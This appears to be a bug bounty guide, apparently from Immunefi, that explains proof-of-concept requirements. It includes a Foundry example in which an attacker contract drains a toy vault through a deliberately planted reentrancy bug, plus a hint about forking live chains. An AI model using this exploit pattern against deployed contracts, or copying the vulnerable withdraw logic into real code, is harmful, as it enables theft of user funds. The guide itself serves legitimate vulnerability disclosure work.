“PoC required” appears on most, if not all, bug bounty program pages, in the “Rewards by Threat Level” section near the top. However, on some programs a PoC is only required for critical or high severity findings.
PoC stands for Proof-of-Concept, and is defined as “runnable code that demonstrates that a bug/vulnerability and its impact are real, without actually exploiting the vulnerability in a live environment”. This matters because it lets the impact and feasibility of a vulnerability be assessed without affecting the actual protocol.
In general, here are the things to take note of:
- Writing a PoC for a vulnerability requires some amount of coding, as well as setting up a local blockchain environment such as Hardhat or Foundry to run it.
- Screenshots of code are not acceptable as PoCs.
- PoCs can be written in any framework or language so long as it can sufficiently demonstrate the vulnerability.
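To make the above concrete, here is an added example of the shape a Foundry PoC usually takes; it is not code from Immunefi or from any bug bounty program. The target is a constructed toy vault with a deliberately planted reentrancy bug (the contract names, the `ToyVault` bug and the balances are all hypothetical), and it assumes a standard Foundry project with `forge-std` installed. The test sets up the state, runs the attack, and then asserts on the impact, which is what a triager needs to see.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Constructed toy target for illustration only (not a real protocol): a vault
// whose withdraw() sends ETH before zeroing the caller's balance, so it can be
// re-entered.
contract ToyVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0; // state updated only after the external call
    }
}

// Attacker contract: re-enters withdraw() from its receive() hook until the
// vault holds less than one more payout.
contract Attacker {
    ToyVault public vault;

    constructor(ToyVault _vault) {
        vault = _vault;
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        if (address(vault).balance >= 1 ether) {
            vault.withdraw();
        }
    }
}

contract ToyVaultPoC is Test {
    ToyVault vault;
    Attacker attacker;
    address victim = makeAddr("victim");

    function setUp() public {
        vault = new ToyVault();
        attacker = new Attacker(vault);
        // An honest user funds the vault with 10 ETH (constructed sample state).
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vault.deposit{value: 10 ether}();
    }

    function testDrainVault() public {
        // Precondition: the vault holds the victim's 10 ETH.
        assertEq(address(vault).balance, 10 ether);

        // Attacker deposits 1 ETH and triggers the reentrant withdraw loop.
        vm.deal(address(this), 1 ether);
        attacker.attack{value: 1 ether}();

        // Impact: the vault is empty, the attacker holds all 11 ETH, and the
        // victim's recorded balance is intact but can no longer be withdrawn.
        assertEq(address(vault).balance, 0);
        assertEq(address(attacker).balance, 11 ether);
        assertEq(vault.balances(victim), 10 ether);

        vm.prank(victim);
        vm.expectRevert("transfer failed");
        vault.withdraw();
    }
}
```

Run it with `forge test --match-contract ToyVaultPoC -vvvv` so the trace is included in the report. For a real submission the same structure applies, except that `setUp` would typically fork the live chain with `vm.createSelectFork` and bind to the deployed contract address instead of deploying a toy, so the assertions demonstrate impact against real state without touching the live protocol.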
If you’ve never written a PoC before… Don’t panic!
Many whitehats have found themselves in your shoes in the past. Some of them are now elites who have earned 5-7 figure bounties after learning how to write a valid PoC. In case it’s not clear enough, learning to write a PoC is not optional, and it is almost guaranteed to boost your chances of success as a whitehat on Immunefi.
Here are some additional resources to help you write your PoC:
- How to PoC your Bug Leads — https://medium.com/immunefi/how-to-poc-your-bug-leads-5ec76abdc1d8
- Immunefi PoC Templates — https://medium.com/immunefi/immunefi-poc-templates-4345f098ac69
- Proof of Concept (PoC) Guidelines and Rules — https://immunefisupport.zendesk.com/hc/en-us/articles/9946217628561-Proof-of-Concept-PoC-Guidelines-and-Rules